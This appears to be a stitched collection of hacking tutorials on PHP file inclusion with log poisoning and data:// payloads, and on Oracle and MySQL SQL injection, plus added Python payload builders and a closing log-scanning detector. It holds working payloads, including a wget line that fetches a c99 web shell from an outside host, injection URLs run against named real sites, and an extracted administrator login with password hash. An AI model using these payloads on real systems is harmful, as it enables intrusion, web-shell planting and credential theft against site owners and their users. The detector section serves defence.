11.11.11.11 - - [05/Feb/2004:21:34:01 -0600] "GET /tindex.php?inc= HTTP/1.1" 200 230 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
11.11.11.11 - - [05/Feb/2004:21:34:04 -0600] "GET /tindex.php?inc=../../../etc/passwd HTTP/1.1" 200 175 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
11.11.11.11 - - [05/Feb/2004:21:34:07 -0600] "GET /index.php?inc=test.php HTTP/1.1" 200 134 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"
11.11.11.11 - - [05/Feb/2004:21:34:08 -0600] "GET /index.php?inc=../../../var/www/logs/access.log HTTP/1.1" 200 164 "-" "test"

If you see test in the output, we can spawn our shell just by changing the User-Agent to:
PHP Code:
<?exec('wget http://www.tektao.com.cn/files/c99.txt -O shell.php');?>
Go to
Code:
http://www.site.com/shell.php
or
Code:
www.site.com/index.php?page=shell.php
Voilà, we have our shell up.
Enjoy.


Using wrapper php://filter:
What is php://filter?

php://filter is a kind of meta-wrapper designed to permit the application of filters to a stream at the time of opening. This is useful with all-in-one file functions such as readfile(), file(), and file_get_contents() where there is otherwise no opportunity to apply a filter to the stream prior the contents being read.

As an attacker you can read juicy files like configuration.php, index.php, database.php, etc.
Let's read the index.php file:

Injection link:
Code:
http://site.com/index.php?file=php://filter/convert.base64-encode/resource=index
It returns the file base64-encoded, like this:
[Image: phpfilter.jpg]

To read it you have to base64-decode the content, e.g. at
base64decode.org
That's it.


Using wrapper data://
The data: (RFC 2397) stream wrapper is available since PHP 5.2.0.
Taking advantage of PHP's RFC 2397 support (http://php.net/manual/en/wrappers.data.php), you can inject the PHP code you want executed directly into the URL. Note that include() only accepts a data: URL when allow_url_include is On, so this fails on a default php.ini.

Lets see it:
Code:
http://www.site.com/index.php?page=data:,<? exec($_GET[cmd]); ?>&cmd=whoami
(the PHP between data:, and & has to be URL-encoded when you actually send it)

It also supports base64 encoding:
Code:
http://www.site.com/index.php?page=data:;base64,PD8gZXhlYygkX0dFVFtjbWRdKTsgPz4=&cmd=whoami

Base64 encoding avoids the characters that would otherwise have to be URL-encoded or that a filter might strip.
Also notice above that $_GET[cmd] is written without quotes. This still works and comes in handy if the server has magic_quotes enabled.

Note: you can also drop a shell with it. Encode
PHP Code:
<? exec('wget http://www.tektao.com.cn/files/c99.txt -O shell.php'); ?>
in base64 (make sure the encoder does not backslash-escape the quotes, or PHP will refuse to parse it) and we get this:
Code:
PD8gZXhlYygnd2dldCBodHRwOi8vd3d3LnRla3Rhby5jb20uY24vZmlsZXMvYzk5LnR4dCAtTyBzaGVsbC5waHAnKTsgPz4=

So the injection will be:
Code:
http://www.site.com/index.php?page=data:;base64,PD8gZXhlYygnd2dldCBodHRwOi8vd3d3LnRla3Rhby5jb20uY24vZmlsZXMvYzk5LnR4dCAtTyBzaGVsbC5waHAnKTsgPz4=

Now navigate to
Code:
http://www.site.com/shell.php
or
Code:
http://www.site.com/index.php?page=shell.php
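An added example (not from the original tutorial) with the helpers used across the wrapper sections: building data: payloads in plain and base64 form, the php://filter value, decoding the base64 a page echoes back, and the ../ ladder from the /etc/passwd step. The PHP snippets and the wget URL are the tutorial's; the function names are mine. The base64 string the post originally gave for the wget payload decodes to exec(\'wget ...\') with backslash-escaped quotes (an artefact of encoding it through a form with magic_quotes), which PHP rejects as a parse error; POSTED_B64 below is that string, and data_wrapper() produces the clean one.

```python
import base64
from urllib.parse import quote

def data_wrapper(php: str, use_base64: bool = True) -> str:
    """Value for the included parameter that makes include() run `php` through
    the data: wrapper (the target needs allow_url_include=On)."""
    if use_base64:
        return "data:;base64," + base64.b64encode(php.encode()).decode()
    return "data:," + quote(php, safe="")

def filter_wrapper(resource: str) -> str:
    """Value that returns the source of `resource` base64-encoded instead of
    executing it, so PHP files can be read through the include."""
    return f"php://filter/convert.base64-encode/resource={resource}"

def decode_filter_output(blob: str) -> str:
    """Turn the base64 the page echoed back into source: drop whitespace that
    the HTML rendering may have inserted and restore any missing '=' padding."""
    s = "".join(blob.split())
    s += "=" * (-len(s) % 4)
    return base64.b64decode(s).decode(errors="replace")

def traversal_candidates(target: str = "etc/passwd", depth: int = 6) -> list:
    """The ../ ladder to try when the include path is relative, as the post does."""
    return [("../" * d) + target for d in range(depth + 1)]

# Payloads from the post (the wget URL is the post's, reproduced, not endorsed).
CMD_STUB = "<? exec($_GET[cmd]); ?>"
SHELL_DROP = "<? exec('wget http://www.tektao.com.cn/files/c99.txt -O shell.php'); ?>"
# The post's own base64 for SHELL_DROP; it decodes with \' escapes (magic_quotes artefact).
POSTED_B64 = ("PD8gZXhlYyhcJ3dnZXQgaHR0cDovL3d3dy50ZWt0YW8uY29tLmNuL2ZpbGVzL2M5OS50eHQgLU8g"
              "c2hlbGwucGhwXCcpOyA/Pg==")

if __name__ == "__main__":
    print(data_wrapper(CMD_STUB) + "&cmd=whoami")
    print(data_wrapper(CMD_STUB, use_base64=False) + "&cmd=whoami")
    print(data_wrapper(SHELL_DROP))
    print("posted payload decodes to:", decode_filter_output(POSTED_B64))
    print(filter_wrapper("index"))
    print(traversal_candidates(depth=3))
```

decode_filter_output() is also what you run on the blob from the php://filter step instead of pasting it into a web decoder; the padding fix matters because pages often trim the trailing '=' characters.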

That's it!

Sorry if I have made a mistake.

Saturday 5 January 2013

Oracle SQL injection tutorial

Hello guys, this is a tutorial about Oracle-based SQL injection.
Here is the site to learn with

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 

Let's try ORDER BY:

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 order by 1 

Look under the picture; the breadcrumb stays like this:
Sei in : Home -> Citta' -> Congressi

At order by 7 it changes:

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122%20order%20by%207 
Sei in : Home -> Citta' ->
So the number of columns is 6.

Time to use UNION SELECT:

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,null,null,null,null,null 

The vulnerable column isn't shown.
Let's try each column in turn:

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select banner,null,null,null,null,null from v$version 

Nothing shown, wrong column.

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,banner,null,null,null,null from v$version 

The word Congressi is shown again; this is the right column.
Now change id_categoria to null:

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null%20union%20select%20null,banner,null,null,null,null%20from%20v$version

version: CORE 9.2.0.6.0 Production


CURRENT USER

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,user,NULL,NULL,NULL,NULL from dual--
output=WWWTARANTO

CURRENT DATABASE


Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,SYS.DATABASE_NAME,NULL,NULL,NULL,NULL from DUAL--

output=CSTTA

Another method:
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,global_name,NULL,NULL,NULL,NULL from global_name-- -



Time to get tables:
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null union select null,table_name,null,null,null,null from (select ROWNUM r,table_name from all_tables order by table_name) where r=130
This returns table number 130; change r to step through the tables (Oracle has no LIMIT, so ROWNUM in a subquery does the paging).

Time to get this table's columns:

PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null%20union%20select%20null,column_name,null,null,null,null%20from%20%28select%20ROWNUM%20r,column_name%20from%20all_tab_columns%20where%20table_name=%27RESULT$%27%29%20where%20r=3

Change r here too.

Retrieving user-created tables and columns from user_tab_columns. concat() works in Oracle but takes only two parameters, so || is used to join the names instead.


Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS--

54425F414C424F3A444154415F45534543555A494F4E45
Convert this hex value to a string (rawtohex() gives the hex of the bytes):
TB_ALBO:DATA_ESECUZIONE

To find the next column of table TB_ALBO

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where column_name> CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--

Code:
CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69) = DATA_ESECUZIONE

54425F414C424F3A444154415F505542424C4943415A494F4E45
TB_ALBO:DATA_PUBBLICAZIONE

Using > with the previous value, all columns can be retrieved. If an error is generated or the query jumps to some other table, move on to the next table. (Without an ORDER BY the row that comes back is whichever Oracle happens to return first, which is why it can jump; pinning the table with table_name=... and asking for min(column_name) makes the walk deterministic.)

MOVING TO NEXT TABLE

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79)--

54425F414C424F5F444F43554D454E544F3A4445534352495A494F4E45
TB_ALBO_DOCUMENTO:DESCRIZIONE

MOVING TO NEXT COLUMN OF TABLE TB_ALBO_DOCUMENTO

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79) and column_name> CHR(68) || CHR(69) || CHR(83) || CHR(67) || CHR(82) || CHR(73) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--

54425F414C424F5F444F43554D454E544F3A4944
TB_ALBO_DOCUMENTO:ID

EXTRACTING DATA

Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(LOGIN||chr(58)||PASSWORD),NULL,NULL,NULL,NULL from TB_UTENTE--

61646D696E6973747261746F723A3966323165646463363865663338373837666235656639313939316265613264

administrator:9f21eddc68ef38787fb5ef91991bea2d
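Added example, not part of the original tutorial: the helpers this Oracle walk needs in practice, in Python. They decode a rawtohex() result back to text (the hex values are the ones shown above), build the CHR(n) || CHR(n) form of a string for the quote-free comparisons, and generate the ROWNUM-paged queries so r=N can be stepped in a loop. next_column_query() is my deterministic variant of the column_name > '...' step: it pins the table with = and asks for min(column_name) above the last value, so it cannot jump to another table. The column layout (six columns, data in the second) is the post's; function names are mine.

```python
from typing import Tuple

def rawtohex_decode(hex_blob: str) -> str:
    """rawtohex(x) gives upper-case hex of x's bytes; undo it (ignoring stray spaces)."""
    return bytes.fromhex("".join(hex_blob.split())).decode("latin-1")

def split_pair(hex_blob: str, sep: str = ":") -> Tuple[str, str]:
    """Decode a rawtohex(a||chr(58)||b) result into (a, b)."""
    a, _, b = rawtohex_decode(hex_blob).partition(sep)
    return a, b

def chr_concat(s: str) -> str:
    """'DATA' -> 'CHR(68) || CHR(65) || CHR(84) || CHR(65)': a string literal with no quotes."""
    return " || ".join(f"CHR({ord(c)})" for c in s)

def rownum_query(expr: str, source: str, r: int, where: str = "") -> str:
    """Oracle has no LIMIT: number the rows with ROWNUM in a subquery and pick row r.
    Keeps the post's layout: six columns, the data in the second."""
    w = f" where {where}" if where else ""
    return (f"union select null,{expr},null,null,null,null from "
            f"(select ROWNUM r,{expr} from {source}{w} order by {expr}) where r={r}")

def next_column_query(table: str, after: str) -> str:
    """Deterministic form of the post's  column_name > 'X'  step: the smallest column
    name after `after` *within the same table*, both literals written as CHR() chains."""
    t = chr_concat(table)
    return (f"union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL "
            f"from USER_TAB_COLUMNS where table_name=({t}) and column_name=("
            f"select min(column_name) from USER_TAB_COLUMNS where table_name=({t}) "
            f"and column_name>({chr_concat(after)}))--")

if __name__ == "__main__":
    print(split_pair("54425F414C424F3A444154415F45534543555A494F4E45"))
    print(chr_concat("DATA_ESECUZIONE"))
    print(rownum_query("table_name", "all_tables", 130))
    print(rownum_query("column_name", "all_tab_columns", 3, "table_name='RESULT$'"))
    print(next_column_query("TB_ALBO", "DATA_ESECUZIONE"))
```

Looping r from 1 upwards in rownum_query() and stopping at the first empty page enumerates the tables without guessing numbers; the ORDER BY inside the subquery is what makes consecutive r values land on consecutive rows.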



Wednesday 2 January 2013

Error based sql injection tutorial - Double query injection

Let's start the injection.
What you need is a vulnerable site like this:


Code:
www.site.com/artist.php?i=36

First, test the site for the vulnerability:

Code:
www.site.com/artist.php?i=36'
We get an error:
[Image: erroryu.png]

OK, let's inject this:

Code:
www.site.com/artist.php?i=36 order by 10--  no error
www.site.com/artist.php?i=36 order by 20--  no error
www.site.com/artist.php?i=36 order by 50--  no error
www.site.com/artist.php?i=36 order by 100--    no error

So, as with a string-based injection, let's try this:

Code:
www.site.com/artist.php?i=36' order by 100--+

Now we get an error about the columns:
[Image: unknownd.png]

Now let's find the column count:
Code:
www.site.com/artist.php?i=36' order by 10--+    error

www.site.com/artist.php?i=36' order by 8--+    error
www.site.com/artist.php?i=36' order by 6--+    error
www.site.com/artist.php?i=36' order by 5--+    no error

OK, we found the number of columns; the next step is using UNION to find the vulnerable column to inject into:

Code:
www.site.com/artist.php?i=36' union select 1,2,3,4,5--+
As you see:

Code:
The used SELECT statements have a different number of columns
[Image: unionr.png]

So what can we do? Let's try another method, blind injection:

Code:
www.site.com/artist.php?i=36' and 1=1--+    true, no error
www.site.com/artist.php?i=36' and 1=2--+    false, and still no error
What now?
Should we give up and find another site?
No, let's try another method called ERROR-BASED INJECTION (DOUBLE QUERY).

In this method we use a specific syntax that forces the database to leak data inside an error message.

The code we use for getting the version (and likewise database() and user()) is this:

Code:
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Now trying this syntax on our site:

Code:

http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[Image: 81406053.png]

Note: we don't have to use the hex delimiters

Code:
0x7e,0x27
The syntax works without them, like this:


Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select concat(version())) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

It works fine, but there is something else you should know. When we remove the hex delimiters the result looks like this:

[Image: 24262231.png]

As you can see there is a stray "1" right after the version string, and it will be there in every result. It is the floor(rand(0)*2) value, which is part of the GROUP BY key that MySQL prints back; the delimiters just keep it visibly separate from the data. It can confuse someone new to this type of injection, so in this tutorial I write all the syntax with the hex values.

Tip: If our target uses version 4 or lower, look at what happens when we use this syntax for getting the version and database name:


Code:
http://www.kusuri.co.uk/view_product.php?id=242 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

[Image: version4l.png]
Don't worry.
There is another code for this type of site with which you can find the version, database and user of the site; the code looks like this:


Code:
or 1 group by concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2)) having min(0) or

Now we try this on the site:

Code:
http://www.kusuri.co.uk/view_product.php?id=242 or 1 group by concat_ws(0x7e,version(),user(),database(),floor(rand(0)*2)) having min(0) or 1--+
[Image: ve4.png]

As you see in the picture, the version is 4 and we succeeded in finding it.

Now we have the version and database, so let's move on to injecting our target.
[Image: 13063360.png]

To extract how many databases exist on the site, we use another syntax, like this one:

Code:
and(select 1 from(select count(*),concat((select (select (select
concat(0x7e,0x27,count(schema_name),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables
limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

Check the results for our target:

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(schema_name),0x27,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[Image: 87804024jb.png]

Now, using this code and changing the LIMIT offset, we can find all the DBs:

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(schema_name),0x27,0x7e) from information_schema.schemata limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+

By changing the first LIMIT we can get every entry from the DB, like this:
Code:
limit 0,1   for the first entry
limit 1,1   for the second entry
  .
  .
  .
limit N,1   for the entry at offset N


For getting the tables of a database I use " table_schema=0x{hex-database-name} " (the database name, hex-encoded).
First, let's take a look at how many tables our chosen DB has:

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name} limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[Image: nober.png]

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(table_name),0x27,0x7e) from information_schema.tables where table_schema=0x{hex-database-name} limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[Image: tabeo.png]

By stepping the first LIMIT through the numbers, all the tables are enumerated.
I found the table name " mass_users ", and now we should extract the column names of this table to gain admin access.

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,count(column_name),0x27,0x7e) from information_schema.columns where table_schema=0x{hex-database-name} and table_name=0x6d6173735f7573657273 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[Image: 21094341.png]

It only has five columns; let's get them:

Code:
http://www.site.com/artist.php?i=36' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,concat(column_name),0x27,0x7e) from information_schema.columns where table_schema=0x{hex-database-name} and table_name=0x6d6173735f7573657273 limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1--+
[Image: img209.imageshack.us/img209/949/userb.png]
[Image: passy.png]

All the columns are here:
Code:
id,username,password,firstname,email

Last step: extract the values of these columns:

Code:
http://www.site.com/artist.php?i=36' and+(select 1 from(select+count(*),concat((select+concat(username,0x3a,password,0x3a,email) from mass_users+limit+0,1),floor(rand(0)*2))x from information_schema.tables+group by x)a) and 1=1--+
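As an added example (not part of this tutorial), here is a Python scan that flags the request shapes used above when they show up in web-server access logs: it URL-decodes the query twice, strips the MySQL comment tricks (/**/, /*!50000select*/) and then matches the floor(rand(0)*2) double-query pattern, information_schema lookups, UNION column probes and AND n=m boolean probes. The log lines, IPs and paths are constructed placeholders, not a real target.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (placeholder IPs and paths, not a real target)
# that replay the request shapes shown in the tutorial above.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Jan/2013:10:00:01 +0000] "GET /artist.php?i=36 HTTP/1.1" 200 512',
    '203.0.113.5 - - [19/Jan/2013:10:00:02 +0000] "GET /artist.php?i=36\'%20union%20select%201,2,3,4,5--+ HTTP/1.1" 500 120',
    '203.0.113.5 - - [19/Jan/2013:10:00:03 +0000] "GET /artist.php?i=36\'%20and%201=2--+ HTTP/1.1" 200 300',
    '203.0.113.5 - - [19/Jan/2013:10:00:04 +0000] "GET /artist.php?i=36\'%20and(select%201%20from(select%20count(*),'
    'concat((select%20version()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1--+ HTTP/1.1" 500 180',
    '203.0.113.5 - - [19/Jan/2013:10:00:05 +0000] "GET /view_product.php?id=242%20or%201%20group%20by%20concat_ws(0x7e,version(),'
    'user(),database(),floor(rand(0)*2))%20having%20min(0)%20or%201--+ HTTP/1.1" 500 180',
    '198.51.100.7 - - [19/Jan/2013:10:00:06 +0000] "GET /artist.php?i=36%20/**/union/*!50000select*/%201,2,3 HTTP/1.1" 500 100',
]

REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

# Each signature is checked against the normalized (decoded, comment-stripped) query.
SIGNATURES = [
    ("double-query error-based", re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)")),
    ("schema enumeration", re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns|schemata)\b")),
    ("union column probe", re.compile(r"\bunion\b(?:\s+all|\s+distinct(?:row)?)?\s+select\b")),
    ("boolean probe", re.compile(r"\band\s+\d+\s*=\s*\d+\s*--")),
]

def normalize(url: str) -> str:
    """Decode twice (catches %25-double-encoding), strip MySQL comment tricks
    used as whitespace, collapse whitespace and lowercase, so the signatures
    see roughly the SQL text the server would see."""
    text = unquote_plus(unquote_plus(url))
    text = re.sub(r"/\*!\d*", " ", text)                # /*!50000select*/ -> ' select*/'
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)  # /**/ and /* ... */
    text = text.replace("*/", " ")                      # leftover closers from /*!...*/
    return re.sub(r"\s+", " ", text).lower()

def scan(lines):
    """Return (client_ip, path, [matched signature names]) for each flagged request."""
    hits = []
    for line in lines:
        m = REQ_RE.search(line)
        if not m:
            continue
        norm = normalize(m.group(1))
        reasons = [name for name, rx in SIGNATURES if rx.search(norm)]
        if reasons:
            hits.append((line.split()[0], m.group(1).split("?", 1)[0], reasons))
    return hits
```

Running scan(SAMPLE_LOG) flags five of the six constructed lines; the inline-comment line is caught only because normalize() strips the comments before matching.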